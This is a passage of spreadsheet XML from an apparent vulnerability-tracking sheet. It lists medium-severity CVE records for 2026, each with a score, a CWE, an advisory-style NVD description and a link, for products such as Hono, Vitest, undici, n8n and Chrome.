      <c r="I4483" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4483" s="5" t="inlineStr"/>
      <c r="K4483" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L4483" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, Hono's query helpers treat a question mark after a literal hash fragment as the start of a query string, so the application can read request parameters that browsers, new URL(), reverse proxies, filtering rules, parameter allow and deny lists, access logging, request validation, and other middleware do not observe. The Cache Middleware removes the fragment when building its cache key, allowing a response influenced by parameters inside the fragment to be stored under a key that omits those parameters and later served to other users. This can bypass filtering and auditing, poison cached responses, and enable stored cross-site scripting when an affected parameter is reflected into cached HTML without escaping. Exploitation requires a runtime and intermediary path that passes a literal hash character through to the request URL; Cloudflare Workers and intermediaries that strip fragments are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M4483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t>
        </is>
      </c>
    </row>
    <row r="4484">
      <c r="A4484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84373</t>
        </is>
      </c>
      <c r="C4484" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4484" s="5" t="inlineStr"/>
      <c r="F4484" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4484" s="5" t="inlineStr"/>
      <c r="H4484" s="5" t="inlineStr"/>
      <c r="I4484" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4484" s="5" t="inlineStr"/>
      <c r="K4484" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4484" s="5" t="inlineStr">
        <is>
          <t>Vitest is a testing framework powered by Vite. From 2.1.0 until 4.1.11 and 5.0.0-rc.2, the public mockerPlugin and standalone interceptorPlugin exports in packages/mocker/src/node/interceptorPlugin.ts register the vitest:interceptor:register handler on Vite's unauthenticated HMR WebSocket without validating redirect targets against the file-serving allowlist. The implementation processes event.redirect without enforcing server.fs.allow and server.fs.deny through isFileLoadingAllowed. A remote client that can reach an exposed development server can submit an opaque URL scheme preserving .. segments, causing join(server.config.root, redirectUrl.pathname) to resolve outside the project root. The plugin's load hook then returns readFile(mock.redirect, 'utf-8') as module source, disclosing local files readable by the dev-server process. Vitest browser mode uses a token-authenticated RPC and is not remotely unauthenticated by default, although the same boundary check was missing on that path. This issue is fixed in versions 4.1.11 and 5.0.0-rc.2.</t>
        </is>
      </c>
      <c r="M4484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t>
        </is>
      </c>
    </row>
    <row r="4485">
      <c r="A4485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84378</t>
        </is>
      </c>
      <c r="C4485" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4485" s="5" t="inlineStr"/>
      <c r="F4485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4485" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4485" s="5" t="inlineStr"/>
      <c r="I4485" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4485" s="5" t="inlineStr"/>
      <c r="K4485" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L4485" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. From 2.5.0 until 2.10.0, the HTTPX2 Server-Sent Events parser in src/httpx2/httpx2/_sse.py repeatedly copies and rescans buffered text in _SSELineDecoder.decode() when an attacker-controlled or compromised SSE endpoint splits one unterminated line across many response chunks. The behavior affects httpx2.Client.sse() and httpx2.AsyncClient.sse(), and the total processing work grows quadratically with the line length, allowing a crafted stream to consume excessive CPU and block a synchronous worker or asynchronous event loop. This issue is fixed in version 2.10.0.</t>
        </is>
      </c>
      <c r="M4485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t>
        </is>
      </c>
    </row>
    <row r="4486">
      <c r="A4486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84890</t>
        </is>
      </c>
      <c r="C4486" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4486" s="5" t="inlineStr"/>
      <c r="F4486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4486" s="5" t="inlineStr"/>
      <c r="H4486" s="5" t="inlineStr"/>
      <c r="I4486" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4486" s="5" t="inlineStr"/>
      <c r="K4486" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4486" s="5" t="inlineStr">
        <is>
          <t>undici's decompress interceptor decompresses response bodies according to the untrusted Content-Encoding header. While the number of content-encoding layers is capped, the total decompressed output size is unbounded and there is no configuration option to limit it. A malicious or faulty upstream can therefore return a small compressed payload, a compression bomb, that expands to hundreds of megabytes or more in client memory, an asymmetric resource consumption that can exhaust memory and crash the process. This affects undici versions from 7.15.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M4486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84890</t>
        </is>
      </c>
    </row>
    <row r="4487">
      <c r="A4487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84970</t>
        </is>
      </c>
      <c r="C4487" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4487" s="5" t="inlineStr"/>
      <c r="F4487" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4487" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4487" s="5" t="inlineStr">
        <is>
          <t>mongodb:c\+\+_driver</t>
        </is>
      </c>
      <c r="I4487" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4487" s="5" t="inlineStr"/>
      <c r="K4487" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L4487" s="5" t="inlineStr">
        <is>
          <t>A numeric truncation weakness exists in the JSON parsing component of the MongoDB C++ Driver's BSON library. An actor who controls the text that an embedding application hands to the library's public JSON parsing interface, when that text is very large, can cause the library to read memory beyond the supplied buffer and return it to the caller, to silently accept only part of the input as a complete document, or to terminate the process. No MongoDB server, credentials, or non-default configuration is required; the effect is confined to the process that uses the library.</t>
        </is>
      </c>
      <c r="M4487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84970</t>
        </is>
      </c>
    </row>
    <row r="4488">
      <c r="A4488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85014</t>
        </is>
      </c>
      <c r="C4488" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4488" s="5" t="inlineStr"/>
      <c r="F4488" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4488" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4488" s="5" t="inlineStr"/>
      <c r="I4488" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4488" s="5" t="inlineStr"/>
      <c r="K4488" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="L4488" s="5" t="inlineStr">
        <is>
          <t>undici's experimental WebSocketStream client crashes the whole Node.js process when a remote peer closes the TCP connection without a WebSocket close handshake. On an unclean close the internal socket-close handler calls abort on the writable stream unconditionally and discards the returned promise, but per the WHATWG Streams standard aborting a locked writable returns a promise that rejects with a TypeError. Because the application holds a writer on that writable, which is the only way to write, the rejection is never observed and Node's default unhandled-rejection behavior terminates the process. An untrusted server can therefore crash a client with a single abrupt disconnect, with no authentication and no application mistake. This affects undici versions from 7.0.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M4488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85014</t>
        </is>
      </c>
    </row>
    <row r="4489">
      <c r="A4489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="C4489" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4489" s="5" t="inlineStr"/>
      <c r="F4489" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4489" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4489" s="5" t="inlineStr"/>
      <c r="I4489" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4489" s="5" t="inlineStr"/>
      <c r="K4489" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L4489" s="5" t="inlineStr">
        <is>
          <t>undici bundles a WebSocket client whose permessage-deflate size-limit cleanup removes all listeners from the internal zlib inflate stream, including its error listener, while that stream can still emit. When a remote peer sends a compressed payload that crosses the built-in 128 MiB decompressed-payload limit and then contains a malformed DEFLATE byte, the inflate stream emits a data error with no listener attached, which Node.js treats as a fatal unhandled error and terminates the entire process. Exploitation is remote and unauthenticated, requires no application mistake, and is asymmetric, since roughly 130 KB on the wire expands past the limit and crashes the process, and reconnecting can repeat the crash. This affects undici versions from 6.25.0 up to 6.28.1, from 7.28.0 up to 7.29.1, and from 8.1.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M4489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="4490">
      <c r="A4490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85534</t>
        </is>
      </c>
      <c r="C4490" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4490" s="5" t="inlineStr"/>
      <c r="F4490" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4490" s="5" t="inlineStr"/>
      <c r="H4490" s="5" t="inlineStr"/>
      <c r="I4490" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4490" s="5" t="inlineStr"/>
      <c r="K4490" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L4490" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libsoup. When a client sends an HTTP/2 request body from a non-pollable input stream, the library can buffer more data than the current flow-control window later allows. A malicious HTTP/2 server can shrink SETTINGS_INITIAL_WINDOW_SIZE while that buffered read is still in progress. The client then copies the full buffer into a smaller DATA callback without a runtime bounds check, which can abort the process or fail the HTTP/2 session.</t>
        </is>
      </c>
      <c r="M4490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85534</t>
        </is>
      </c>
    </row>
    <row r="4491">
      <c r="A4491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86073</t>
        </is>
      </c>
      <c r="C4491" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4491" s="5" t="inlineStr"/>
      <c r="F4491" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4491" s="5" t="inlineStr"/>
      <c r="H4491" s="5" t="inlineStr"/>
      <c r="I4491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4491" s="5" t="inlineStr"/>
      <c r="K4491" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4491" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M4491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t>
        </is>
      </c>
    </row>
    <row r="4492">
      <c r="A4492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86074</t>
        </is>
      </c>
      <c r="C4492" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4492" s="5" t="inlineStr"/>
      <c r="F4492" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4492" s="5" t="inlineStr"/>
      <c r="H4492" s="5" t="inlineStr"/>
      <c r="I4492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4492" s="5" t="inlineStr"/>
      <c r="K4492" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4492" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M4492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t>
        </is>
      </c>
    </row>
    <row r="4493">
      <c r="A4493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86506</t>
        </is>
      </c>
      <c r="C4493" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4493" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4493" s="5" t="inlineStr"/>
      <c r="F4493" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4493" s="5" t="inlineStr"/>
      <c r="H4493" s="5" t="inlineStr"/>
      <c r="I4493" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4493" s="5" t="inlineStr"/>
      <c r="K4493" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4493" s="5" t="inlineStr">
        <is>
          <t>In JetBrains GoLand before 2026.2.2.1 missing authentication on the GoLand profiler's injected pprof server exposed profiling data</t>
        </is>
      </c>
      <c r="M4493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86506</t>
        </is>
      </c>
    </row>
    <row r="4494">
      <c r="A4494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86735</t>
        </is>
      </c>
      <c r="C4494" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4494" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4494" s="5" t="inlineStr"/>
      <c r="F4494" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4494" s="5" t="inlineStr"/>
      <c r="H4494" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I4494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4494" s="5" t="inlineStr"/>
      <c r="K4494" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4494" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M4494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t>
        </is>
      </c>
    </row>
    <row r="4495">
      <c r="A4495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86993</t>
        </is>
      </c>
      <c r="C4495" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4495" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4495" s="5" t="inlineStr"/>
      <c r="F4495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4495" s="5" t="inlineStr"/>
      <c r="H4495" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I4495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4495" s="5" t="inlineStr"/>
      <c r="K4495" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4495" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, a Log Streaming event destination could reference a generic HTTP credential and decrypt whichever credential ID it named without an ownership check. A user with a custom global role carrying Log Streaming scopes could select a credential belonging to another project and send its decrypted secret to an attacker-controlled endpoint. The affected authorization boundary is packages/cli/src/modules/log-streaming.ee/destinations/destination-credentials-access.ts and the credential:read scope. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t>
        </is>
      </c>
    </row>
    <row r="4496">
      <c r="A4496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87123</t>
        </is>
      </c>
      <c r="C4496" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4496" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4496" s="5" t="inlineStr"/>
      <c r="F4496" s="5" t="inlineStr"/>
      <c r="G4496" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4496" s="5" t="inlineStr"/>
      <c r="I4496" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4496" s="5" t="inlineStr"/>
      <c r="K4496" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L4496" s="5" t="inlineStr">
        <is>
          <t>hbs is an Express view engine wrapper for Handlebars. Version 4.3.0 can crash the Node.js process during output escaping when an async helper, registered with registerAsyncHelper, resolves to an object whose toHTML property is truthy but not callable. Handlebars escapeExpression calls the toHTML method on any value that has a truthy toHTML, so such a value throws a TypeError, and because the async substitution runs on a later tick outside the render function's try/catch, the throw is an uncaught exception that terminates the process without sending a response. Only version 4.3.0 is affected, since the throwing escape was introduced by the fix for CVE-2026-16231 and earlier versions do not escape async helper values. It can be triggered remotely when an async helper resolves to an externally influenced object such as parsed JSON. The issue is fixed in hbs 4.3.1, and users should upgrade to hbs 4.3.1 or later.</t>
        </is>
      </c>
      <c r="M4496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87123</t>
        </is>
      </c>
    </row>
    <row r="4497">
      <c r="A4497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87482</t>
        </is>
      </c>
      <c r="C4497" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4497" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4497" s="5" t="inlineStr"/>
      <c r="F4497" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4497" s="5" t="inlineStr"/>
      <c r="H4497" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I4497" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4497" s="5" t="inlineStr"/>
      <c r="K4497" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L4497" s="5" t="inlineStr">
        <is>
          <t>Cleartext transmission of sensitive data in HttpsUpgrades in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87482</t>
        </is>
      </c>
    </row>
    <row r="4498">
      <c r="A4498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87590</t>
        </is>
      </c>
      <c r="C4498" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4498" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4498" s="5" t="inlineStr"/>
      <c r="F4498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4498" s="5" t="inlineStr"/>
      <c r="H4498" s="5" t="inlineStr"/>
      <c r="I4498" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4498" s="5" t="inlineStr"/>
      <c r="K4498" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4498" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially leak sensitive information via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87590</t>
        </is>
      </c>
    </row>
    <row r="4499">
      <c r="A4499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87737</t>
        </is>
      </c>
      <c r="C4499" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4499" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4499" s="5" t="inlineStr"/>
      <c r="F4499" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4499" s="5" t="inlineStr"/>
      <c r="H4499" s="5" t="inlineStr"/>
      <c r="I4499" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4499" s="5" t="inlineStr"/>
      <c r="K4499" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L4499" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec package before 2.4.0 for OCaml. There is a timing side channel for NIST elliptic-curve scalar multiplication: the time required for a lookup can depend on a secret.</t>
        </is>
      </c>
      <c r="M4499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87737</t>
        </is>
      </c>
    </row>
    <row r="4500">
      <c r="A4500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88763</t>
        </is>
      </c>
      <c r="C4500" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4500" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4500" s="5" t="inlineStr"/>
      <c r="F4500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4500" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H4500" s="5" t="inlineStr"/>
      <c r="I4500" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4500" s="5" t="inlineStr"/>
      <c r="K4500" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L4500" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the skupper-router component of Red Hat Service Interconnect, which is used to provide secure communication between distributed services. The issue occurs when the router processes a specially crafted network message using its AMQP field parser. Due to a lack of bounds on recursion during parsing, the router can run out of stack memory and crash, leading to a denial of service for the interconnected network.</t>
        </is>
      </c>
      <c r="M4500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88763</t>
        </is>
      </c>
    </row>
    <row r="4501">
      <c r="A4501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9036</t>
        </is>
      </c>
      <c r="C4501" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4501" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4501" s="5" t="inlineStr"/>
      <c r="F4501" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4501" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4501" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I4501" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4501" s="5" t="inlineStr"/>
      <c r="K4501" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4501" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 does not validate or improperly validates TLS certificate validation, which could allow an attacker to obtain sensitive information using man in the middle techniques.</t>
        </is>
      </c>
      <c r="M4501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9036</t>
        </is>
      </c>
    </row>
    <row r="4502">
      <c r="A4502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9744</t>
        </is>
      </c>
      <c r="C4502" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4502" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4502" s="5" t="inlineStr"/>
      <c r="F4502" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4502" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4502" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I4502" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4502" s="5" t="inlineStr"/>
      <c r="K4502" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L4502" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 does not validate or improperly validates TLS certificate validation, which could allow an attacker to obtain sensitive information using man in the middle techniques.</t>
        </is>
      </c>
      <c r="M4502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9744</t>
        </is>
      </c>
    </row>
    <row r="4503">
      <c r="A4503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0306</t>
        </is>
      </c>
      <c r="C4503" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4503" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4503" s="5" t="inlineStr"/>
      <c r="F4503" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4503" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H4503" s="5" t="inlineStr"/>
      <c r="I4503" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4503" s="5" t="inlineStr"/>
      <c r="K4503" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
